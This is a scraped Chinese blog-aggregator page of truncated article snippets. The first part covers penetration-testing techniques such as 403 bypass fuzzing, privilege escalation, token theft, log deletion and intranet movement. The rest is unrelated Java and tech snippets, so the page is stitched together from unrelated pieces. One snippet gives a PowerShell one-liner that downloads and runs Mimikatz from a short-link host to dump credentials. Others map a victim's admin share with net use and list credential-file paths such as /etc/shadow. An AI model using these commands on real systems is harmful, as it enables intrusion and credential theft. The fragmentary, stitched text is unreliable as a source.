- 渗透技巧之403绕过【总结】
gaynell
总结系统安全安全web安全其他
文章目录渗透技巧之403绕过【总结】0x01前言0x02背景1.什么是网页403?2.什么是403绕过?3.造成403的成因0x03绕过方式1.绕过IP限制2.url覆盖绕过3.扩展名绕过(路径fuzz)4.更换协议版本5.HTTP请求方法fuzz6.修改Referer7.修改user-agent8.常用自动化工具0x04实战分析渗透技巧之403绕过【总结】0x01前言免责声明:请勿利用文章内的相
- 渗透技巧之403绕过_指纹识别
NL0ck_S
渗透测试网络安全chromefirefoxsafari
403绕过清单FFUF路径模糊测试ffuf-w403_url_payloads.txt-uhttp://example.com/auth_pathFUZZ-fc403,401,400HTTP标头模糊测试ffuf-w403_bypass_header_names.txt:HEADER-w403_bypass_header_values.txt:VALUE-uhttp://example.com/au
- 【渗透技巧】资产探测及信息收集
hacker鬼七
网络安全web安全网络
一、前言在众测中,基本上SRC的漏洞收集范围有如下几种形式:形式一:暂时仅限以下系统:www.xxx.com,其他域名不在此次测试范围内形式二:只奖励与*.xxx.com相关的漏洞形式三:无限制形式一,基本被限定了范围形式二,注重于子域名的收集形式三,子域名及相关域名的收集另外,随着企业内部业务的不断壮大,各种业务平台和管理系统越来越多,很多单位往往存在着“隐形资产”,这些“隐形资产”通常被管理员
- 从 Admin 权限切换到 System 权限
老白_
系统系统权限
渗透技巧——从Admin权限切换到System权限0x00前言在渗透测试中,某些情况下需要用到system权限,例如操作注册表HKEY_LOCAL_MACHINESAMSAM恰巧最近看到了一篇文章介绍了几种获得system权限的方法,于是决定结合自己的经验对这方面的技巧做系统整理当然,前提是已经获得系统的管理员权限学习链接:https://blog.xpnsec.com/becoming-syst
- 渗透测试面试、渗透技巧
艾欧尼亚归我了
渗透
一、思路流程1、信息收集a、服务器的相关信息(真实ip,系统类型,版本,开放端口,WAF等)b、网站指纹识别(包括,cms,cdn,证书等),dns记录c、whois信息,姓名,备案,邮箱,电话反查(邮箱丢社工库,社工准备等)e、子域名收集,旁站,C段等f、googlehacking针对化搜索,pdf文件,中间件版本,弱口令扫描等g、扫描网站目录结构,爆后台,网站banner,测试文件,备份等敏感
- 渗透测试面试问题2021版,内含大量渗透技巧
渗透测试老鸟-九青
网络安全面试渗透测试网络安全pythonphpweb安全
目录思路流程信息收集漏洞挖掘漏洞利用&权限提升清除测试数据&输出报告复测问题1.拿到一个待检测的站,你觉得应该先做什么?2.判断出网站的CMS对渗透有什么意义?3.一个成熟并且相对安全的CMS,渗透时扫目录的意义?4.常见的网站服务器容器。5.mysql注入点,用工具对目标站直接写入一句话,需要哪些条件?6.目前已知哪些版本的容器有解析漏洞,具体举例。7.如何手工快速判断目标站是windows还是
- 2021Web安全面试题大全(附答案详解)看完稳了
大明湖畔的九青
面试分享面试java网络安全web安全渗透测试
人人都有一个进大厂的梦想,而进大厂的门槛也可想而知,所以这里整理了一份安全大厂的面试大全,看完文章如果对你有帮助的话希望能够点赞+收藏+关注!感谢!本篇文章对于学习Web安全的朋友来说应该是目前最全面的面试题合集了,后续也会陆续更新其他大厂的面试题目和知识点。另外我还整理了许多关于Web安全的学习资料+工具包等等,需要的点击Web安全学习一、渗透测试面试题,包含大量渗透技巧1.拿到一个待检测的站,
- rsync的几则tips(渗透技巧)
Coisini、
实战篇
关于rsyncrsync(remotesynchronize)——Linux下实现远程同步功能的软件,能同步更新两处计算机的文件及目录。在同步文件时,可以保持源文件的权限、时间、软硬链接等附加信息。常被用于在内网进行源代码的分发及同步更新,因此使用人群多为开发人员;而开发人员安全意识薄弱、安全技能欠缺往往是导致rsync出现相关漏洞的根源。rsync默认配置文件为/etc/rsyncd.conf,
- 渗透技巧——Token窃取与利用
weixin_30312557
作者:print("")分类:信息安全发布时间:2018-06-0217:21编辑0x00前言在之前的文章《渗透技巧——程序的降权启动》介绍了使用SelectMyParent降权的方法,本质上是通过token窃取实现的。这一次将要对token窃取和利用做进一步介绍,测试常用工具,分享利用技巧。0x01简介本文将要介绍以下内容;Token简介Metasploit中的incognitoWindows平
- 内网渗透----Token 窃取与利用
浅笑⁹⁹⁶
#内网技巧
0x00前言在之前的文章《渗透技巧——程序的降权启动》介绍了使用SelectMyParent降权的方法,本质上是通过token窃取实现的。这一次将要对token窃取和利用做进一步介绍,测试常用工具,分享利用技巧。0x01简介本文将要介绍以下内容;·Token简介·Metasploit中的incognito·Windows平台下的incognito·Invoke-TokenManipulation.
- 红蓝对抗之域名搜集方法总结
腾讯安全应急响应中心
作者:腾讯蓝军实习生jax、yhy、A1oe前言在历次HW、红蓝对抗、渗透测试项目中,外网的信息收集是至关重要的一个环节,外网打点信息收集全面了,可能会有四两拨千斤效果,直接突破外网边界进入内网。最近我们三人加入腾讯蓝军学习渗透技巧,导师让我们对域名资产收集方式做一次全面梳理研究。子域名是域名信息收集的一个重要部分,在防御措施严密情况下我们无法直接拿下主域名,那么就可以采用迂回战术拿下子域名,然后
- 【内网渗透】域渗透技巧 => 第三方工具API
qq_27446553
Windows渗透
前言域管理进程转移,使得渗透测试人员能够模拟在互联网上的域名管理员账户进行操作。尽管如此,在渗透测试开始之前需要确认系统中进程是否运行。在这篇博文中,我讲介绍5个技巧来帮助大家去做这些事情。本地检测查询活跃的域控制器扫描远程系统上运行的任务扫描远程系统上NetBIOS信息PSExec扫描远程系统上的身份验证令牌获取域名管理员权限在大多数情况下,本篇文章关注的焦点在于识别运行于域名管理进程的系统。以
- BT5中MSF很强大的一个工具
小-龟
Byadmin¶Postedin入侵渗透技巧¶Leaveareply综合扫描服务器的软件MSF(在线攻击)msfconsole进入db_nmap-TAggressive-sV-n-O-vIP(调用nmap扫描指定ip)db_hosts(nmap的结果自动保存在hosts中)db_autopwn-p-t-e-Iip(指定IP攻击-指定IP只局限与hosts里面指定的)db_autopwn-p-t-e
- LINUX渗透与提权总结
weixin_34255793
本文为Linux渗透与提权技巧总结篇,旨在收集各种Linux渗透技巧与提权版本,方便各位同学在日后的渗透测试中能够事半功倍。Linux系统下的一些常见路径:001/etc/passwd002003/etc/shadow004005/etc/fstab006007/etc/host.conf008009/etc/motd010011/etc/ld.so.conf012013/var/www/htdo
- 各种提权、渗透经验技巧总结大全(下)
netsec_steven
liunx相关提权渗透技巧总结,一、ldap渗透技巧:1.cat/etc/nsswitch看看密码登录策略我们可以看到使用了fileldap模式2.less/etc/ldap.confbaseou=People,dc=unix-center,dc=net找到ou,dc,dc设置3.查找管理员信息匿名方式ldapsearch-x-D“cn=administrator,cn=People,dc=uni
- Linux渗透技巧+实战
god_7z1
LinuxHacking
一.ldap渗透技巧1.cat/etc/nsswitch看看密码登录策略我们可以看到使用了fileldap模式2.less/etc/ldap.confbaseou=People,dc=unix-center,dc=net找到ou,dc,dc设置3.查找管理员信息匿名方式ldapsearch-x-D“cn=administrator,cn=People,dc=unix-center,dc=net”-
- 渗透技巧——Windows日志的删除与绕过
weixin_34160277
本文讲的是渗透技巧——Windows日志的删除与绕过,0x00前言在渗透测试过程中,Windows日志往往会记录系统上的敏感操作,如添加用户,远程登录执行等。对于一次完整的渗透测试,通常会选择对Windows日志进行清除和绕过,而对于防御者来说,了解常用的绕过方法也有助于更好的保护自己的系统。所以本文将要介绍常见的Windows日志清除与绕过方法,分享经验,帮助大家。0x01简介本文将要介绍以下内
- 渗透技巧总结
bit小兵
旁站路径问题1、读网站配置。2、用以下VBSOnErrorResumeNextIf(LCase(Right(WScript.Fullname,11))="wscript.exe")ThenMsgboxSpace(12)&"IISVirtualWebViewer"&Space(12)&Chr(13)&Space(9)&"Usage:CscriptvWeb.vbs",4096,"Lilo"WScrip
- 渗透技巧:Windows平台运行Masscan和Nmap
weixin_34185364
本文讲的是渗透技巧:Windows平台运行Masscan和Nmap,0x00前言在内网渗透中,信息搜集尤为重要。面对内网的复杂环境,虽说网络扫描容易暴露自己,但通过扫描可以发现内网的存活主机、开放端口,运行服务、操作系统等信息,为进一步渗透奠定基础。扫描工具的选取,不仅要考虑功能,更要考虑工具的适用性。现实中的跳板通常并不是一台Linux服务器,没有合适的环境安装Nmap、Zmap和Masscan
- VMware Workstation 中安装metasploitable 2
xyyz..
虚拟机渗透metasploitable
脆弱系统(vulnerableserver)——一台存在很多漏洞的虚拟主机。也叫做靶机。用于练习渗透技巧,了解主机漏洞。这里安装的靶机是metasploitable-linux-2.0.0,安装过程如下:1、https://sourceforge.net/projects/metasploitable/,官网下载安装包:metasploitable-linux-2.0.0.zip2、解压metas
- 内网渗透技巧
mirror97black
内网渗透
通过powershell运行mimikatzpowershell"IEX(New-ObjectNet.WebClient).DownloadString('http://is.gd/oeoFuI');Invoke-Mimikatz-DumpCreds"获取hash之后,解出明文密码将目标机器共享盘映射到本地的h盘netuseh:\\ip\c$"密码"/user:"用户名"注意,映射盘对方也可以看到
- 【渗透技巧】资产探测及信息收集
Bypass--
渗透测试
一、前言在众测中,基本上SRC的漏洞收集范围有如下几种形式:形式一:暂时仅限以下系统:www.xxx.com,其他域名不在此次测试范围内形式二:只奖励与*.xxx.com相关的漏洞形式三:无限制形式一,基本被限定了范围形式二,注重于子域名的收集形式三,子域名及相关域名的收集另外,随着企业内部业务的不断壮大,各种业务平台和管理系统越来越多,很多单位往往存在着“隐形资产”,这些“隐形资产”通常被管理员
- web狗日记之Vulnhub-five86-2
传说中的彩虹海
你di韩商言运维linuxshellpython安全
主要考察:1、wpcms渗透技巧2、Wpcms插件漏洞的使用3、流量捕获以及分析4、Linux提权Vulnhub官网速度感人,朋友给了这个站点,下载比较快点:http://five86.com/five86-2.html导入到虚拟机里,ip貌似为动态分配,网卡我习惯设置为桥接模式,于是nmap扫出d段,这个不用废话了,也没截图。找到ip登录主站的时候,去说明前看了看,大概了解,不是那种右键源代码就
- 总结16种网站渗透技巧经验分享
weixin_30633949
1.利用网站过滤不严直接绕过后台验证,在网站后面加上admin/session.asp或admin/left.asp2.有的网站进后台会出现一个脚本提示框,输入:administrator即可突破!因为admin代表以管理员身份进入的意思。3.有的网站开了3389,入侵之前先去连接3389,尝试弱口令或是爆破,再者就是按5次shift键,看看有没前人装过后门,然后再社工密码。4.有时候进后台会弹出
- 渗透技巧——获得Powershell命令的历史记录
systemino
0x00前言我在最近的学习过程中,发现Powershell命令的历史记录有时会包含系统敏感信息,例如远程服务器的连接口令,于是我对Powershell的历史记录功能做了进一步研究,总结一些渗透测试中常用导出历史记录的方法,结合利用思路,给出防御建议。0x01简介本文将要介绍以下内容:·两种Powershell命令的历史记录·导出Powershell命令历史记录的方法·防御建议0x02两种Power
- 各种渗透,提权的经验和技巧总结(中)
eudemon_cn
网络杂谈入侵防护
liunx相关提权渗透技巧总结,一、ldap渗透技巧:1.cat/etc/nsswitch看看密码登录策略我们可以看到使用了fileldap模式2.less/etc/ldap.confbaseou=People,dc=unix-center,dc=net找到ou,dc,dc设置3.查找管理员信息匿名方式ldapsearch-x-D"cn=administrator,cn=People,dc=uni
- 【PHP渗透技巧拓展】————2、利用 Gopher 协议拓展攻击面
FLy_鹏程万里
【渗透测试拓展】———PHP相关技巧
1概述Gopher协议是HTTP协议出现之前,在Internet上常见且常用的一个协议。当然现在Gopher协议已经慢慢淡出历史。Gopher协议可以做很多事情,特别是在SSRF中可以发挥很多重要的作用。利用此协议可以攻击内网的FTP、Telnet、Redis、Memcache,也可以进行GET、POST请求。这无疑极大拓宽了SSRF的攻击面。2攻击面测试2.1环境IP:172.19.23.218
- 2017年9月3日——周总结
FKTX
一周回顾:上周只能用一个词语来形容,就是杂乱。思想杂乱,内心浮躁。一口饭吃不成胖子,我却妄想一步登天。我学了什么?WAF?IPS?还是防火墙?还是绕WAF等各种渗透方法?是的,我好像都学了,但是,又好像都没学。为什么这么说?因为我每个都是没有学精,没有学踏实。学WAF又去了解了IPS,学了IPS又去了解了防火墙,了解防火墙的同时又去了解了渗透技巧。杂乱无序,没有规划,学习效果自然很差。原因出自哪里
- 渗透技巧--通过cmd上传文件的N种方法
Bugl0v3r
渗透技巧--通过cmd上传文件的N种方法1.debugdebug是一个程序调试工具,功能包括:(win7以上版本好像没有)直接输入,更改,跟踪,运行汇编语言源程序观察操作系统的内容查看ROMBIOS的内容观察更改RAM内部的设置值以扇区或文件的方式读写软盘数据特别的是它还有一个功能可以将十六进制代码转换为可执行文件:hex思路:把需要上传的exe转换成十六进制hex的形式通过echo命令将hex代
- 我的渗透装备
yo_哥
@[渗透技巧,yoyoyang]终级渗透BOSSPentestBox(windows)kalilinuxChromeF12,打开开发者工具,功能==Firebug+本地存储观察等SwitchSharp插件,代理必备postman插件,接口调试工具(RESTClient)FirefoxFirebug,调试JS,HTTP请求响应观察,Cookie,DOM树观察等ProxySwitcher,代理必备ha
- java封装继承多态等
麦田的设计者
javaeclipsejvmcencapsulatopn
最近一段时间看了很多的视频却忘记总结了,现在只能想到什么写什么了,希望能起到一个回忆巩固的作用。
1、final关键字
译为:最终的
&
- F5与集群的区别
bijian1013
weblogic集群F5
http请求配置不是通过集群,而是F5;集群是weblogic容器的,如果是ejb接口是通过集群。
F5同集群的差别,主要还是会话复制的问题,F5一把是分发http请求用的,因为http都是无状态的服务,无需关注会话问题,类似
- LeetCode[Math] - #7 Reverse Integer
Cwind
java题解MathLeetCodeAlgorithm
原题链接:#7 Reverse Integer
要求:
按位反转输入的数字
例1: 输入 x = 123, 返回 321
例2: 输入 x = -123, 返回 -321
难度:简单
分析:
对于一般情况,首先保存输入数字的符号,然后每次取输入的末位(x%10)作为输出的高位(result = result*10 + x%10)即可。但
- BufferedOutputStream
周凡杨
首先说一下这个大批量,是指有上千万的数据量。
例子:
有一张短信历史表,其数据有上千万条数据,要进行数据备份到文本文件,就是执行如下SQL然后将结果集写入到文件中!
select t.msisd
- linux下模拟按键输入和鼠标
被触发
linux
查看/dev/input/eventX是什么类型的事件, cat /proc/bus/input/devices
设备有着自己特殊的按键键码,我需要将一些标准的按键,比如0-9,X-Z等模拟成标准按键,比如KEY_0,KEY-Z等,所以需要用到按键 模拟,具体方法就是操作/dev/input/event1文件,向它写入个input_event结构体就可以模拟按键的输入了。
linux/in
- ContentProvider初体验
肆无忌惮_
ContentProvider
ContentProvider在安卓开发中非常重要。与Activity,Service,BroadcastReceiver并称安卓组件四大天王。
在android中的作用是用来对外共享数据。因为安卓程序的数据库文件存放在data/data/packagename里面,这里面的文件默认都是私有的,别的程序无法访问。
如果QQ游戏想访问手机QQ的帐号信息一键登录,那么就需要使用内容提供者COnte
- 关于Spring MVC项目(maven)中通过fileupload上传文件
843977358
mybatisspring mvc修改头像上传文件upload
Spring MVC 中通过fileupload上传文件,其中项目使用maven管理。
1.上传文件首先需要的是导入相关支持jar包:commons-fileupload.jar,commons-io.jar
因为我是用的maven管理项目,所以要在pom文件中配置(每个人的jar包位置根据实际情况定)
<!-- 文件上传 start by zhangyd-c --&g
- 使用svnkit api,纯java操作svn,实现svn提交,更新等操作
aigo
svnkit
原文:http://blog.csdn.net/hardwin/article/details/7963318
import java.io.File;
import org.apache.log4j.Logger;
import org.tmatesoft.svn.core.SVNCommitInfo;
import org.tmateso
- 对比浏览器,casperjs,httpclient的Header信息
alleni123
爬虫crawlerheader
@Override
protected void doGet(HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException
{
String type=req.getParameter("type");
Enumeration es=re
- java.io操作 DataInputStream和DataOutputStream基本数据流
百合不是茶
java流
1,java中如果不保存整个对象,只保存类中的属性,那么我们可以使用本篇文章中的方法,如果要保存整个对象 先将类实例化 后面的文章将详细写到
2,DataInputStream 是java.io包中一个数据输入流允许应用程序以与机器无关方式从底层输入流中读取基本 Java 数据类型。应用程序可以使用数据输出流写入稍后由数据输入流读取的数据。
- 车辆保险理赔案例
bijian1013
车险
理赔案例:
一货运车,运输公司为车辆购买了机动车商业险和交强险,也买了安全生产责任险,运输一车烟花爆竹,在行驶途中发生爆炸,出现车毁、货损、司机亡、炸死一路人、炸毁一间民宅等惨剧,针对这几种情况,该如何赔付。
赔付建议和方案:
客户所买交强险在这里不起作用,因为交强险的赔付前提是:“机动车发生道路交通意外事故”;
如果是交通意外事故引发的爆炸,则优先适用交强险条款进行赔付,不足的部分由商业
- 学习Spring必学的Java基础知识(5)—注解
bijian1013
javaspring
文章来源:http://www.iteye.com/topic/1123823,整理在我的博客有两个目的:一个是原文确实很不错,通俗易懂,督促自已将博主的这一系列关于Spring文章都学完;另一个原因是为免原文被博主删除,在此记录,方便以后查找阅读。
有必要对
- 【Struts2一】Struts2 Hello World
bit1129
Hello world
Struts2 Hello World应用的基本步骤
创建Struts2的Hello World应用,包括如下几步:
1.配置web.xml
2.创建Action
3.创建struts.xml,配置Action
4.启动web server,通过浏览器访问
配置web.xml
<?xml version="1.0" encoding="
- 【Avro二】Avro RPC框架
bit1129
rpc
1. Avro RPC简介 1.1. RPC
RPC逻辑上分为二层,一是传输层,负责网络通信;二是协议层,将数据按照一定协议格式打包和解包
从序列化方式来看,Apache Thrift 和Google的Protocol Buffers和Avro应该是属于同一个级别的框架,都能跨语言,性能优秀,数据精简,但是Avro的动态模式(不用生成代码,而且性能很好)这个特点让人非常喜欢,比较适合R
- lua set get cookie
ronin47
lua cookie
lua:
local access_token = ngx.var.cookie_SGAccessToken
if access_token then
ngx.header["Set-Cookie"] = "SGAccessToken="..access_token.."; path=/;Max-Age=3000"
end
- java-打印不大于N的质数
bylijinnan
java
public class PrimeNumber {
/**
* 寻找不大于N的质数
*/
public static void main(String[] args) {
int n=100;
PrimeNumber pn=new PrimeNumber();
pn.printPrimeNumber(n);
System.out.print
- Spring源码学习-PropertyPlaceholderHelper
bylijinnan
javaspring
今天在看Spring 3.0.0.RELEASE的源码,发现PropertyPlaceholderHelper的一个bug
当时觉得奇怪,上网一搜,果然是个bug,不过早就有人发现了,且已经修复:
详见:
http://forum.spring.io/forum/spring-projects/container/88107-propertyplaceholderhelper-bug
- [逻辑与拓扑]布尔逻辑与拓扑结构的结合会产生什么?
comsci
拓扑
如果我们已经在一个工作流的节点中嵌入了可以进行逻辑推理的代码,那么成百上千个这样的节点如果组成一个拓扑网络,而这个网络是可以自动遍历的,非线性的拓扑计算模型和节点内部的布尔逻辑处理的结合,会产生什么样的结果呢?
是否可以形成一种新的模糊语言识别和处理模型呢? 大家有兴趣可以试试,用软件搞这些有个好处,就是花钱比较少,就算不成
- ITEYE 都换百度推广了
cuisuqiang
GoogleAdSense百度推广广告外快
以前ITEYE的广告都是谷歌的Google AdSense,现在都换成百度推广了。
为什么个人博客设置里面还是Google AdSense呢?
都知道Google AdSense不好申请,这在ITEYE上也不是讨论了一两天了,强烈建议ITEYE换掉Google AdSense。至少,用一个好申请的吧。
什么时候能从ITEYE上来点外快,哪怕少点
- 新浪微博技术架构分析
dalan_123
新浪微博架构
新浪微博在短短一年时间内从零发展到五千万用户,我们的基层架构也发展了几个版本。第一版就是是非常快的,我们可以非常快的实现我们的模块。我们看一下技术特点,微博这个产品从架构上来分析,它需要解决的是发表和订阅的问题。我们第一版采用的是推的消息模式,假如说我们一个明星用户他有10万个粉丝,那就是说用户发表一条微博的时候,我们把这个微博消息攒成10万份,这样就是很简单了,第一版的架构实际上就是这两行字。第
- 玩转ARP攻击
dcj3sjt126com
r
我写这片文章只是想让你明白深刻理解某一协议的好处。高手免看。如果有人利用这片文章所做的一切事情,盖不负责。 网上关于ARP的资料已经很多了,就不用我都说了。 用某一位高手的话来说,“我们能做的事情很多,唯一受限制的是我们的创造力和想象力”。 ARP也是如此。 以下讨论的机子有 一个要攻击的机子:10.5.4.178 硬件地址:52:54:4C:98
- PHP编码规范
dcj3sjt126com
编码规范
一、文件格式
1. 对于只含有 php 代码的文件,我们将在文件结尾处忽略掉 "?>" 。这是为了防止多余的空格或者其它字符影响到代码。例如:<?php$foo = 'foo';2. 缩进应该能够反映出代码的逻辑结果,尽量使用四个空格,禁止使用制表符TAB,因为这样能够保证有跨客户端编程器软件的灵活性。例
- linux 脱机管理(nohup)
eksliang
linux nohupnohup
脱机管理 nohup
转载请出自出处:http://eksliang.iteye.com/blog/2166699
nohup可以让你在脱机或者注销系统后,还能够让工作继续进行。他的语法如下
nohup [命令与参数] --在终端机前台工作
nohup [命令与参数] & --在终端机后台工作
但是这个命令需要注意的是,nohup并不支持bash的内置命令,所
- BusinessObjects Enterprise Java SDK
greemranqq
javaBOSAPCrystal Reports
最近项目用到oracle_ADF 从SAP/BO 上调用 水晶报表,资料比较少,我做一个简单的分享,给和我一样的新手 提供更多的便利。
首先,我是尝试用JAVA JSP 去访问的。
官方API:http://devlibrary.businessobjects.com/BusinessObjectsxi/en/en/BOE_SDK/boesdk_ja
- 系统负载剧变下的管控策略
iamzhongyong
高并发
假如目前的系统有100台机器,能够支撑每天1亿的点击量(这个就简单比喻一下),然后系统流量剧变了要,我如何应对,系统有那些策略可以处理,这里总结了一下之前的一些做法。
1、水平扩展
这个最容易理解,加机器,这样的话对于系统刚刚开始的伸缩性设计要求比较高,能够非常灵活的添加机器,来应对流量的变化。
2、系统分组
假如系统服务的业务不同,有优先级高的,有优先级低的,那就让不同的业务调用提前分组
- BitTorrent DHT 协议中文翻译
justjavac
bit
前言
做了一个磁力链接和BT种子的搜索引擎 {Magnet & Torrent},因此把 DHT 协议重新看了一遍。
BEP: 5Title: DHT ProtocolVersion: 3dec52cb3ae103ce22358e3894b31cad47a6f22bLast-Modified: Tue Apr 2 16:51:45 2013 -070
- Ubuntu下Java环境的搭建
macroli
java工作ubuntu
配置命令:
$sudo apt-get install ubuntu-restricted-extras
再运行如下命令:
$sudo apt-get install sun-java6-jdk
待安装完毕后选择默认Java.
$sudo update- alternatives --config java
安装过程提示选择,输入“2”即可,然后按回车键确定。
- js字符串转日期(兼容IE所有版本)
qiaolevip
TODateStringIE
/**
* 字符串转时间(yyyy-MM-dd HH:mm:ss)
* result (分钟)
*/
stringToDate : function(fDate){
var fullDate = fDate.split(" ")[0].split("-");
var fullTime = fDate.split("
- 【数据挖掘学习】关联规则算法Apriori的学习与SQL简单实现购物篮分析
superlxw1234
sql数据挖掘关联规则
关联规则挖掘用于寻找给定数据集中项之间的有趣的关联或相关关系。
关联规则揭示了数据项间的未知的依赖关系,根据所挖掘的关联关系,可以从一个数据对象的信息来推断另一个数据对象的信息。
例如购物篮分析。牛奶 ⇒ 面包 [支持度:3%,置信度:40%] 支持度3%:意味3%顾客同时购买牛奶和面包。 置信度40%:意味购买牛奶的顾客40%也购买面包。 规则的支持度和置信度是两个规则兴
- Spring 5.0 的系统需求,期待你的反馈
wiselyman
spring
Spring 5.0将在2016年发布。Spring5.0将支持JDK 9。
Spring 5.0的特性计划还在工作中,请保持关注,所以作者希望从使用者得到关于Spring 5.0系统需求方面的反馈。